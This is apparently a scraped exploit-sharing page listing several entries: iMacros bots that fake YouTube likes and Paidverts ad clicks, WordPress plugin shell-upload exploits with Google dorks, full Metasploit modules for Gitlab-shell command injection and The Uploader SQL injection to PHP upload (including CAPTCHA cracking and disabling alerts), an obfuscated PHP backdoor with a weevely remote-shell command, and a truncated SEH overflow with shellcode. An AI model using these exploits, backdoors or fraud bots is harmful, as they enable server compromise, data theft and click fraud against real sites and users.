xDay Exploit
v10
today : | at : | safemode : ON
> / home / facebook / twitter / exit /
name author perms com modified label

Likesplanet [ Dislike , Likes ] YouTube Videos Exploit [Imacros] Unknown rwxr-xr-x 3 12:42 PM

Filename Likesplanet [ Dislike , Likes ] YouTube Videos Exploit [Imacros]
Permission rw-r--r--
Author Unknown
Date and Time 12:42 PM
Label
Action
# Without the pressure in Like or DisLike

VERSION BUILD=8820413 RECORDER=FX
TAB T=1
URL GOTO=[ xDay-Exploit.blogspot.com ]
TAG POS=1 TYPE=INPUT:SUBMIT ATTR=*
TAB T=2
WAIT SECONDS=2
TAB CLOSE
WAIT SECONDS=7
TAG POS=1 TYPE=INPUT:SUBMIT ATTR=*
TAB T=2
WAIT SECONDS=2
TAB CLOSE
WAIT SECONDS=7
TAG POS=1 TYPE=INPUT:SUBMIT ATTR=*
TAB T=2
WAIT SECONDS=2
TAB CLOSE
WAIT SECONDS=7
TAG POS=1 TYPE=INPUT:SUBMIT ATTR=*
TAB T=2
WAIT SECONDS=2
TAB CLOSE
WAIT SECONDS=7

Change [ xDay-Exploit.blogspot.com ] To :
For YouTube Videos Likes : http://likesplanet.com/ytlike.php
For YouTube Dislike Videos : http://likesplanet.com/ytdislike.php

# Anass Ibn El Farouk

Paidverts [Imacros] Exploit Unknown rwxr-xr-x 1 12:37 PM

Filename Paidverts [Imacros] Exploit
Permission rw-r--r--
Author Unknown
Date and Time 12:37 PM
Label
Action
'Paidverts Auto Clicker Version 1.1
' !!! WARNING !!! DO NOT MAKE AMMENDMENTS TO THE SCRIPT OF ANY SORTS UNLESS YOU KNOW WHAT YOU'RE DOING !!!//
VERSION BUILD=8810214 RECORDER=FX
SET !ERRORIGNORE YES
SET !EXTRACT_TEST_POPUP NO
SET !TIMEOUT_PAGE 15
TAB T=1
URL GOTO=http://paidverts.com
WAIT SECONDS=2.5
TAG POS=1 TYPE=A ATTR=TXT:MEMBERS<SP>HOME<SP>PAGE
WAIT SECONDS=1.5
TAG POS=1 TYPE=SPAN ATTR=TXT:VIEW<SP>PAID<SP>ADS
WAIT SECONDS=1.5
TAG POS=1 TYPE=A ATTR=ID:view-1
WAIT SECONDS=2.5
TAG POS=1 TYPE=DIV ATTR=ID:t-1 EXTRACT=TXT
SET !VAR1 {{!EXTRACT}}
TAG POS=1 TYPE=INPUT:TEXT ATTR=ID:text-1 CONTENT={{!VAR1}}
SET !EXTRACT NULL
WAIT SECONDS=3.5
TAG POS=1 TYPE=DIV ATTR=ID:t-2 EXTRACT=TXT
SET !VAR2 {{!EXTRACT}}
TAG POS=1 TYPE=INPUT:TEXT ATTR=ID:text-2 CONTENT={{!VAR2}}
SET !EXTRACT NULL
WAIT SECONDS=3.5
TAG POS=1 TYPE=DIV ATTR=ID:t-3 EXTRACT=TXT
SET !VAR3 {{!EXTRACT}}
TAG POS=1 TYPE=INPUT:TEXT ATTR=ID:text-3 CONTENT={{!VAR3}}
SET !EXTRACT NULL
WAIT SECONDS=3.5
TAG POS=1 TYPE=INPUT:SUBMIT ATTR=ID:view_ad
WAIT SECONDS=3
TAB T=2
WAIT SECONDS=35
TAG POS=1 TYPE=INPUT:SUBMIT ATTR=ID:button
WAIT SECONDS=8
TAB T=1
TAB CLOSEALLOTHERS
WAIT SECONDS=2.5
TAG POS=1 TYPE=A ATTR=TXT:View<SP>another<SP>ad
WAIT SECONDS=10
' End of Code

Wordpress Lazy SEO plugin 1.1.9 - Shell Upload Vulnerability Unknown rwxr-xr-x 1 10:22 AM

Filename Wordpress Lazy SEO plugin 1.1.9 - Shell Upload Vulnerability
Permission rw-r--r--
Author Unknown
Date and Time 10:22 AM
Label
Action
#######################################################################
# Exploit Title :  Wordpress Lazy SEO plugin Shell Upload Vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Google Dork: : inurl:/wp-content/plugins/lazy-seo/
# Date: 2013/09/21
# Software Link : http://downloads.wordpress.org/plugin/lazy-seo.1.1.9.zip
# Version : 1.1.9
# Tested on: Windows
##############
#
#Location: Site/wp-content/plugins/lazy-seo/lazyseo.php
#
##############
#1.Go to address : Site/wp-content/plugins/lazy-seo/lazyseo.php
#2.Click on Browse...
#3.Select Shell Code
#3.Complete the fields
#4.Press Enter
#5.Shell Address : wp-content/plugins/lazy-seo/Shell.php
##############

Gitlab-shell Code Execution Unknown rwxr-xr-x 1 10:20 AM

Filename Gitlab-shell Code Execution
Permission rw-r--r--
Author Unknown
Date and Time 10:20 AM
Label
Action
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'net/ssh'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Gitlab-shell Code Execution',
      'Description'    => %q(
        This module takes advantage of the addition of authorized
        ssh keys in the gitlab-shell functionality of Gitlab. Versions
        of gitlab-shell prior to 1.7.4 used the ssh key provided directly
        in a system call resulting in a command injection vulnerability. As
        this relies on adding an ssh key to an account valid credentials
        are required to exploit this vulnerability.
      ),
      'Author'  =>
        [
          'Brandon Knight'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'https://about.gitlab.com/2013/11/04/gitlab-ce-6-2-and-5-4-security-release/'],
          ['CVE', '2013-4490']
        ],
      'Platform'  => 'linux',
      'Targets'        =>
        [
          [ 'Linux',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86
            }
          ],
          [ 'Linux (x64)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86_64
            }
          ],
          [ 'Unix (CMD)',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Payload' =>
                {
                  'Compat'      =>
                    {
                      'RequiredCmd' => 'openssl perl python'
                    },
                  'BadChars' => "\x22"
                }
            }
          ],
          [ 'Python',
            {
              'Platform' => 'python',
              'Arch' => ARCH_PYTHON,
              'Payload' =>
                {
                  'BadChars' => "\x22"
                }
            }
          ]
        ],
      'CmdStagerFlavor' => %w( bourne printf ),
      'DisclosureDate' => 'Nov 4 2013',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('USERNAME',  [true, 'The username to authenticate as', 'root']),
        OptString.new('PASSWORD',  [true, 'The password for the specified username', '5iveL!fe']),
        OptString.new('TARGETURI', [true,  'The path to Gitlab', '/'])
      ], self.class)
  end

  def exploit
    login
    case target['Platform']
    when 'unix'
      execute_command(payload.encoded)
    when 'python'
      execute_command("python -c \\\"#{payload.encoded}\\\"")
    when 'linux'
      execute_cmdstager(temp: './', linemax: 2800)
    end
  end

  def execute_command(cmd, _opts = {})
    key_id = add_key(cmd)
    delete_key(key_id)
  end

  def check
    res = send_request_cgi('uri' => normalize_uri(target_uri.path.to_s, 'users', 'sign_in'))
    if res && res.body && res.body.include?('GitLab')
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Unknown
    end
  end

  def login
    username = datastore['USERNAME']
    password = datastore['PASSWORD']
    signin_page = normalize_uri(target_uri.path.to_s, 'users', 'sign_in')

    # Get a valid session cookie and authenticity_token for the next step
    res = send_request_cgi(
                            'method' => 'GET',
                            'cookie' => 'request_method=GET',
                            'uri'    => signin_page
    )

    fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during login") unless res

    local_session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0]
    auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]

    if res.body.include? 'user[email]'
      @gitlab_version = 5
      user_field = 'user[email]'
    else
      @gitlab_version = 7
      user_field = 'user[login]'
    end

    # Perform the actual login and get the newly assigned session cookie
    res = send_request_cgi(
                            'method' => 'POST',
                            'cookie' => local_session_cookie,
                            'uri'    => signin_page,
                            'vars_post' =>
                              {
                                'utf8' => "\xE2\x9C\x93",
                                'authenticity_token' => auth_token,
                                "#{user_field}" => username,
                                'user[password]' => password,
                                'user[remember_me]' => 0
                              }
                          )

    fail_with(Failure::NoAccess, "#{peer} - Login failed") unless res && res.code == 302

    @session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0]

    fail_with(Failure::NoAccess, "#{peer} - Unable to get session cookie") if @session_cookie.nil?
  end

  def add_key(cmd)
    if @gitlab_version == 5
      @key_base = normalize_uri(target_uri.path.to_s, 'keys')
    else
      @key_base = normalize_uri(target_uri.path.to_s, 'profile', 'keys')
    end

    # Perform an initial request to get an authenticity_token so the actual
    # key addition can be done successfully.
    res = send_request_cgi(
                            'method' => 'GET',
                            'cookie' => "request_method=GET; #{@session_cookie}",
                            'uri'    => normalize_uri(@key_base, 'new')
    )

    fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res

    auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]
    title = rand_text_alphanumeric(16)
    key_info = rand_text_alphanumeric(6)

    # Generate a random ssh key
    key = OpenSSL::PKey::RSA.new 2048
    type = key.ssh_type
    data = [key.to_blob].pack('m0')

    openssh_format = "#{type} #{data}"

    # Place the payload in to the key information to perform the command injection
    key = "#{openssh_format} #{key_info}';#{cmd}; echo '"

    res = send_request_cgi(
                            'method' => 'POST',
                            'cookie' => "request_method=GET; #{@session_cookie}",
                            'uri'    => @key_base,
                            'vars_post' =>
                              {
                                'utf8' => "\xE2\x9C\x93",
                                'authenticity_token' => auth_token,
                                'key[title]' => title,
                                'key[key]' => key
                              }
                          )

    fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res

    # Get the newly added key id so it can be used for cleanup
    key_id = res.headers['Location'].split('/')[-1]

    key_id
  end

  def delete_key(key_id)
    res = send_request_cgi(
                             'method' => 'GET',
                             'cookie' => "request_method=GET; #{@session_cookie}",
                             'uri'    => @key_base
                           )

    fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res

    auth_token = res.body.scan(/<meta content="(.*?)" name="csrf-token"/).flatten[0]

    # Remove the key which was added to clean up after ourselves
    res = send_request_cgi(
                             'method' => 'POST',
                             'cookie' => "#{@session_cookie}",
                             'uri'    => normalize_uri("#{@key_base}", "#{key_id}"),
                             'vars_post' =>
                             {
                               '_method' => 'delete',
                               'authenticity_token' => auth_token
                             }
                           )

    fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
  end
end

WordPress Slideshow Gallery Plugin 1.4.6 - Shell Upload Vulnerability Unknown rwxr-xr-x 1 10:20 AM

Filename WordPress Slideshow Gallery Plugin 1.4.6 - Shell Upload Vulnerability
Permission rw-r--r--
Author Unknown
Date and Time 10:20 AM
Label
Action
Summary: WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability.
Date: 2014-08-28
Vendor Homepage: http://tribulant.com/
Software: Slideshow Gallery
Version: 1.4.6
Software Link: http://downloads.wordpress.org/plugin/slideshow-gallery.1.4.6.zip
Tested on: Windows 7 OS, Wordpress 3.9.2 and Chrome Browser.

Description:

I found a serious security vulnerability in the Slideshow Gallery plugin. This bug allows an attacker to upload any php file remotely to the vulnerable website (administrator by default). I have tested and verified that having the current version of the plugin installed in a WordPress installation will allow any registered user (Administrator, Editor, Author, Contributor and Subscriber), to upload a PHP shell to exploit the host system.

Backdoor location: http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php

Today (2014-08-29), I did the notification to vendor and they gave me feedback about the vulnerability by email. The vendor has released a patch a few hours ago. (SlideShow Gallery version 1.4.7 at https://wordpress.org/plugins/slideshow-gallery/changelog).

Proof of Concept (PoC):

1. An attacker uploads a PHP shell file (i.e. backdoor.php):

POST http://192.168.31.128/wordpress/wp-admin/admin.php?page=slideshow- slides&method=save HTTP/1.1
Host: 192.168.31.128
Connection: keep-alive
Content-Length: 2168
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://192.168.31.128
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEGMugMZ1CVkRzbxV DNT: 1
Referer: http://192.168.31.128/wordpress/wp-admin/admin.php?page=slideshow- slides&method=save
Accept-Encoding: gzip,deflate
Accept-Language: es-ES,es;q=0.8,en;q=0.6,it;q=0.4,und;q=0.2
Cookie: wordpress_a8ed7709a5b8081c924ceda6269a7962=master%7C1409465845%7C9ee160d2851bbcdaa2865 e9010d92d46; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_a8ed7709a5b8081c924ceda6269a7962=master%7C1409465845%7C0565892d6d7 f9de1022e4ad95b45d4ac; wp-settings-1=libraryContent%3Dupload%26editor%3Dtinymce; wp- settings-time-1=1409293045
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[id]"

------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[order]"

------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[title]"

Test Shell Upload
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[description]"

------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[showinfo]"

both
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[iopacity]"

70
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[galleries][]"

1
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[type]"

file
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="image_file"; filename="backdoor.php"
Content-Type: application/octet-stream

<?php
$kvgk = str_replace("y","","ysytyry_yreypylyayce"); $dawj="pdGV4cGxvaXQnO2VzhjaGzh8gJzwnLiRrzhLic+JzzhtldmFsKGJhc2U2NF9kZWNvZGUz"; $asrp="gnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKzhCRhKS0zKSkpKSk7ZWzhNobyAnPC8nLzhiR rLic+Jzt9"; $gxfr="hocHJlZ19yzhZXBsYzhWNlKzhGFycmF5KCcvW15cdz1cc1zh0vJywnzhLzh1xzzhLycpLCBhcnJheSz h"; $fdcd="JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihzhyZXNldCgkYSk9PSd3zhaCcgJiYgJGMzhoJGEpPjMpe zhyRrPSd";
$uuod = $kvgk("j", "", "bjase6j4j_jdjejcjojde");
$qcon = $kvgk("av","","avcraveaavteav_avfavuavnavcavtiavoavn");
$rpgy = $qcon('', $uuod($kvgk("zh", "", $fdcd.$dawj.$gxfr.$asrp))); $rpgy();
?>
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[image_url]"

------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[uselink]"

N

------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[link]"

------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[linktarget]"

self
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="submit"

Save Slide
                      ------WebKitFormBoundaryEGMugMZ1CVkRzbxV--
                     
2. The backdoor is located at http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php

3. The attacker uses a security tool (i.e. weevely) in order to communicate with the backdoor.

#weevely http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php whitexploit

Now the attacker has a “telnet-like console”. Finally, the attacker has the remote control of the
vulnerable website.

Vulnerability Disclosure Timeline:
2014-08-28: Discovered vulnerability
2014-08-29: Vendor Notification (support@tribulant.com)
2014-08-29: Vendor Response/Feedback
2014-08-29: Vendor Fix/Patch
2014-08-30: Public Disclosure

The Uploader 2.0.4 (Eng/Ita) Remote File Upload Remote Code Execution Unknown rwxr-xr-x 0 10:19 AM

Filename The Uploader 2.0.4 (Eng/Ita) Remote File Upload Remote Code Execution
Permission rw-r--r--
Author Unknown
Date and Time 10:19 AM
Label
Action
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})
        super(update_info(info,
            'Name'              => 'The Uploader 2.0.4 (Eng/Ita) Remote File Upload',
            'Description'=> %q{
                    This module exploits various flaws in The Uploader to upload a PHP payload
                    to target system. When run with defaults it will search possible URIs for
                    the application and exploit it automatically. Works against both English
                    and Italian language versions. Notably it disables pre-emptive email warnings
                    before uploading the payload, though it leaves log cleanup as a
                    post-exploitation task.
            },
            'Author'            => [ 'Danny Moules' ],
            'References'        =>
                [
                    [ 'URL', 'http://sourceforge.net/projects/theuploader' ],
                    [ 'CVE', '2011-2944' ],
                ],
            'Privileged'        => false,
            'Payload'           =>
                {
                    'DisableNops'   => true,
                    'Keys'        => ['php'],
                },
            'License'           => MSF_LICENSE,
            'Platform'          => 'php',
            'Arch'              => ARCH_PHP,
            'Targets'           => [[ 'Automatic', { }]],
            'DefaultTarget'     => 0,
            'DisclosureDate'    => 'Feb 23 2012',
        ))

        register_options([
            Opt::RHOST,
            Opt::RPORT(80),
            OptString.new(
                'URI',
                [ true, 'Path of application root (default will try common targets)', '/' ]
            ),
            OptInt.new(
                'CRACKATTEMPTS',
                [ true, 'Brute force attempts, if required, to crack CAPTCHA', 200 ]
            ),
            OptBool.new(
                'VERBOSE',
                [ true, 'Verbose output', true ]
            ),
        ], self.class)
    end

    def get_strings(lang)
        if lang == "Eng"
            strings = {
                "sqlisuccess" => /Log-In has been done successfully/,
                "whitelistsuccess" => /The extension has been added successfully/,
                "disablemailsuccess" => /Notification Mail section has been saved successfully/,
                "changedirsuccess" => /Edit Upload Folder section has been saved successfully/,
                "captcharequired" => /No result entered/,
                "uploadsuccess" => /Download Link/,
                "disablecaptchasuccess" =>
                    /Upload Permissions section has been saved successfully/,
            }
        elsif lang == "Ita"
            strings = {
                "sqlisuccess" => /stato effettuato con successo/,
                "whitelistsuccess" => /L'estensione &egrave; stata consentita con successo/,
                "disablemailsuccess" => /Mail di Notifica &egrave; stata salvata con successo/,
                "changedirsuccess" =>
                    /Modifica Cartella Upload &egrave; stata salvata con successo/,
                "captcharequired" => /Non &agrave; stato inserito nessun risultato/,
                "uploadsuccess" => /Link al download/,
                "disablecaptchasuccess" => /Permessi Upload &egrave; stata salvata con successo/,
            }
        end
        return strings
    end

    def exploit
        #Analyse target
        analysis = analyse(datastore['URI'])
        print_status(analysis['status'])
        strings = get_strings(analysis['lang'])
        unless analysis['uri'].nil?
            datastore['URI'] = analysis['uri']
        end

        #Attempt SQLi - Gets the 'first' valid admin account
        data = "username=' OR activated=1-- a"
        data << "&password=a"
        data << "&login=Log-IN"

        res = send_and_verify(
            datastore['URI'] + "login.php",
            "POST",
            "application/x-www-form-urlencoded",
            "",
            data,
            "SQL injection",
            strings['sqlisuccess']
        )

        #Get cookies
        unless res.headers.include?('Set-Cookie')
            raise RuntimeError.new("Nobody gave us a cookie =( SQLi failed")
        end
        choc_chip = res.headers['Set-Cookie']
        if datastore["VERBOSE"]
            print_good("I stole the cookie from the cookie jar: #{choc_chip}")
        end

        #Optionally, analyse configuration
        if datastore["VERBOSE"]
            begin
                config = analyse_config(strings, choc_chip)
                print_status("INFO: Database host is #{config['db_host']}")
                print_status("INFO: Database username is #{config['db_user']}")
                print_status("INFO: Database password is #{config['db_pass']}")
                print_status("INFO: Database name is #{config['db_name']}")
                print_status("INFO: Admin log is #{config['admin_log']}")
            rescue ::Exception => e
                err = "Non-fatal error. Failed to analyse configuration: "
                err << "#{e.class.to_s} #{e.to_s}"
                print_error(err)
            end
        end

        #Whitelist .php extensions for upload
        res = send_and_verify(
            datastore['URI'] + "admin/ajaxmanager.php?section=upload&category=extensionadd",
            "POST",
            "application/x-www-form-urlencoded",
            choc_chip,
            "allowed_ext=php",
            "Whitelisting .php extensions",
            strings['whitelistsuccess']
        )

        # Disable email reporting
        res = send_and_verify(
            datastore['URI'] + "admin/ajaxmanager.php?section=upload&category=mail",
            "POST",
            "application/x-www-form-urlencoded",
            choc_chip,
            "upload_email=0",
            "Disabling email reporting",
            strings['disablemailsuccess']
        )

        # Change upload location to suit us
        data = "upload_directory="
        data << "&upload_full="
        data << datastore['RHOST']
        data << datastore['URI']

        res = send_and_verify(
            datastore['URI'] + "admin/ajaxmanager.php?section=upload&category=uploaddir",
            "POST",
            "application/x-www-form-urlencoded",
            choc_chip,
            data,
            "Changing upload directory to application root",
            strings['changedirsuccess']
        )

        #Disable CAPTCHA on upload (non-fatal)
        begin
            res = send_and_verify(
                datastore['URI'] + "admin/ajaxmanager.php?section=upload&category=captcha",
                "POST",
                "application/x-www-form-urlencoded",
                choc_chip,
                "captcha_upload=0",
                "Disabling CAPTCHA on upload",
                strings['disablecaptchasuccess']
            )
        rescue ::Exception
            print_error("Disabling CAPTCHA on upload failed. Will use cracker if necessary.")
        end

        #Upload PHP payload
        upload_uri = "ajax/upload.php"
        filename = "#{rand_text_alphanumeric(8)}.php"
        boundary = rand_text_alphanumeric(8)
        data = %Q{
--#{boundary}
Content-Disposition: form-data; name="upfile_1"; filename="#{filename}"
Content-Type: text/plain

<?php #{payload.encoded} ?>
--#{boundary}
        }

        res = send_request_raw({
            'uri'       =>  datastore['URI'] + upload_uri,
            'method'    => 'POST',
            'data'      => data + '--',
            'headers'   =>
                {
                    'Cookie'        => choc_chip,
                    'Content-Type'      => 'multipart/form-data; boundary=' + boundary,
                    'Content-Length'    => data.length + 2,
                },
        }, 20)

        #Verify response
        if res.code != 200
            raise RuntimeError.new("Uploading payload failed (HTTP code #{res.code.to_s})")
        end

        # If failure due to CAPTCHA, crack that...
        if res.body =~ strings['captcharequired']
            crack_captcha(data, choc_chip, boundary, upload_uri, strings)
        else
            if res.body =~ strings['uploadsuccess']
                if datastore["VERBOSE"]
                    print_good("Uploading payload succeeded, triggering...")
                end
            else
                err = "Response doesn't look right."
                err << " Uploading payload probably failed (will continue anyway)"
                print_error(err)
            end
        end

        #Attempt to trigger payload
        res = send_request_cgi({
            'uri'       =>  datastore['URI'] + filename,
            'method'    => 'GET',
            'headers'   =>
                {
                    'Cookie' => choc_chip,
                },
        }, 5)

        #Verify response
        if res and res.code != 200
            err = "Triggering payload (/#{filename}) failed "
            err << "(HTTP code #{res.code.to_s})"
            raise RuntimeError.new(err)
        else
            print_good("Triggering payload (/#{filename}) successful")
        end
    end

    def crack_captcha(data, choc_chip, boundary, upload_uri, strings)
        captcha_failed = true
        print_status("CAPTCHA is enabled. Transforming into brute-force CAPTCHA cracker *ping*")

        crack_data = %Q{
#{data}
Content-Disposition: form-data; name="result"

0
--#{boundary}
        }

        patience = datastore['CRACKATTEMPTS']
        for i in (1..patience)

            #First visit index page to trigger CAPTCHA reset
            res = send_request_cgi({
            'uri'       =>  datastore['URI'] + "index.php",
            'method'    => 'GET',
            'headers'   =>
                {
                    'Cookie' => choc_chip
                },
            }, 20)

            #Now try CAPTCHA with result 0. It'll happen eventually (1/30ish chance).
            #Maths-based CAPTCHAs are educational kids!
            res = send_request_raw({
                'uri'       =>  datastore['URI'] + upload_uri,
                'method'    => 'POST',
                'data'      => crack_data + '--',
                'headers'   =>
                    {
                        'Cookie'            => choc_chip,
                        'Content-Type'      => 'multipart/form-data; boundary=' + boundary,
                        'Content-Length'    => crack_data.length + 2,
                    },
            }, 20)

            if res.body =~ strings['uploadsuccess']
                captcha_failed = false
                break
            end
        end

        if captcha_failed
            err = "Could not break CAPTCHA in #{patience.to_s} iterations."
            err << " You might have luck retrying."
            raise RuntimeError.new(err)
        else
            print_good("CAPTCHA broken. Transforming back into a mild-mannered exploit *ping*")
        end
    end

    def send_and_verify(uri, method, ctype, cookie, data, intent, check)
        res = send_request_raw({
            'uri'       => uri,
            'method'    => method,
            'data'      => data,
            'headers'   =>
                {
                    'Cookie'            => cookie,
                    'Content-Type'      => ctype,
                    'Content-Length'    => data.length,
                },
        }, 20)

        #Verify response
        if res.code != 200
            raise RuntimeError.new("#{intent} failed (HTTP code #{res.code.to_s})")
        end
        unless res.body =~ check
            raise RuntimeError.new("Response doesn't look right. #{intent} probably failed")
        end

        if datastore["VERBOSE"]
            print_good("#{intent} succeeded")
        end

        return res
    end

    def analyse(uri_set)
        code = nil
        found_uri = nil
        status = "Unknown state"
        lang = "Eng"

        unless uri_set =~ /\/$/ then
            uri_set = "#{uri_set}/"
            print_status("URI automatically changed to #{uri_set}")
        end

        unless uri_set =~ /^\// then
            uri_set = "/#{uri_set}"
            print_status("URI automatically changed to #{uri_set}")
        end

        if uri_set == "/" then
            uris = [ "/", "/upload/", "/uploader/", "/theuploader/",
                "/the_uploader/", "/The%20Uploader/",
                "/The%20Uploader%202.0.4%20-%20Eng/", "/The%20Uploader%202.0.4%20-%20Ita/"
            ]
        else
            uris = [ uri_set ]
        end

        uris.each do |uri|
            res = send_request_cgi({
                'uri'       =>  uri + "index.php",
                'method'    => 'GET',
            }, 20)

            if res and res.code == 200
                if res.body =~ /The Uploader 2\.0/
                    status = "2.0.* version found at #{uri}"
                    code = Exploit::CheckCode::Vulnerable
                    found_uri = uri
                elsif res.body =~ /The Uploader/
                    status = "Detected unknown version at #{uri}"
                    code = Exploit::CheckCode::Detected
                    found_uri = uri
                end

                unless found_uri.nil?
                    #Set appropriate language
                    if res.body =~ /Sezione Upload/
                        lang = "Ita"
                    end

                    http_fingerprint({ :response => res })
                    break
                end
            end
        end

        if found_uri.nil?
            if uri_set == "/"
                status = "Could not find the web site automatically. Enter URI manually?"
            else
                status = "Could not find the web site."
                status << " Use the default URI to search for the web site automatically"
            end
            code = Exploit::CheckCode::Safe
        end

        return { "code" => code, "uri" => found_uri, "lang" => lang, "status" => status }
    end

    def analyse_config(strings, cookie)
        #Acquire the database details
        res = send_request_cgi({
            'uri'       =>  datastore['URI'] + "admin.php?section=upload&category=server",
            'method'    => 'GET',
            'headers'   =>
                {
                    'Cookie'    => cookie
                },
        }, 20)
        unless res and res.code == 200
            raise RuntimeError.new("Acquiring database details failed")
        end
        r = /<input[^>]*name="host"[^>]*value="([^"]*)".*\/>/
        db_host = r.match(res.body)[1]
        r = /<input[^>]*name="user"[^>]*value="([^"]*)".*\/>/
        db_user = r.match(res.body)[1]
        r = /<input[^>]*name="pass"[^>]*value="([^"]*)".*\/>/
        db_pass = r.match(res.body)[1]
        r = /<input[^>]*name="dbnm"[^>]*value="([^"]*)".*\/>/
        db_name = r.match(res.body)[1]

        #Acquire the admin log details
        res = send_request_cgi({
            'uri'       =>  datastore['URI'] + "admin.php?section=admin&category=admin_log",
            'method'    => 'GET',
            'headers'   =>
                {
                    'Cookie'    => cookie
                },
        }, 20)
        unless res and res.code == 200
            raise RuntimeError.new("Acquiring admin log details failed")
        end
        r = /<input[^>]*name="admin_log"[^>]*checked.*\/>/
        if r.match(res.body)
            admin_log = "active"
        else
            admin_log = "inactive"
        end

        return {
            "db_host" => db_host, "db_user" => db_user, "db_pass" => db_pass,
            "db_name" => db_name, "admin_log" => admin_log,
        }
    end

    def check
        analysis = analyse("/")
        print_status(analysis['status'])
        return analysis['code']
    end
end

Wordpress Font Uploader Plugin 1.2.4 - Arbitrary File Upload Unknown rwxr-xr-x 0 10:18 AM

Filename Wordpress Font Uploader Plugin 1.2.4 - Arbitrary File Upload
Permission rw-r--r--
Author Unknown
Date and Time 10:18 AM
Label
Action
##################################################
# Description : Wordpress Plugins - WordPress Font Uploader Shell Upload
Vulnerability
# Version : 1.2.4
# Link : http://wordpress.org/extend/plugins/font-uploader/
# Plugins : http://downloads.wordpress.org/plugin/font-uploader.1.2.4.zip
# Date : 01-06-2012
# Google Dork : inurl:/wp-content/plugins/font-uploader/
 ##################################################
 
Exploit :

PostShell.php
<?php

$uploadfile="lo.php.ttf";
$ch =
curl_init("http://server/wordpress/wp-content/plugins/font-uploader/font-upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('font'=>"@$uploadfile",
'Submit'=>'submit'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access :
http://www.exemple.com/wordpress/wp-content/plugins/font-uploader/fonts/lo.php.ttf

lo.php.ttf
<?php
phpinfo();
?>

Calavera UpLoader 3.5 - SEH Buffer Overflow Unknown rwxr-xr-x 0 10:17 AM

Filename Calavera UpLoader 3.5 - SEH Buffer Overflow
Permission rw-r--r--
Author Unknown
Date and Time 10:17 AM
Label
Action
#relleno

rell = "\x41"* 477
rell1 = "\x42"* 4000

head = "\x41"* 8
head += "\x0d\x0a\x31\x0d\x0a"
head1 = "\x0d\x0a"
head2 = "170.1.1.0"
head2 +="\x0d\x0a"
head2 +="\x22"
head2 += "C:\Archivos2de2programa\Uploader!\Uploader!23151EXE"
head2 +="\x22"


# shellcode para calc.exe

shellcode = "\x33\xD2\xB2\x50\x80\xF2\x55\x52\xC6\x45"
shellcode += "\x31\x63\xC6\x45\x32\x61\xC6\x45\x33\x6C"
shellcode += "\xC6\x45\x34\x63\xC6\x45\x35\x2E\xC6\x45\x36\x65"
shellcode += "\xC6\x45\x37\x78\xC6\x45\x38\x65\x88\x45"
shellcode += "\x39\x8D\x45\x31\x50\xB9\x31\x75\x66\x31"
shellcode += "\x81\xF1\x69\x4D\x26\x31\xFF\xe1"

# Next SHE
Nshe = "\xeb\x06\x90\x90"
# POP POP RETN
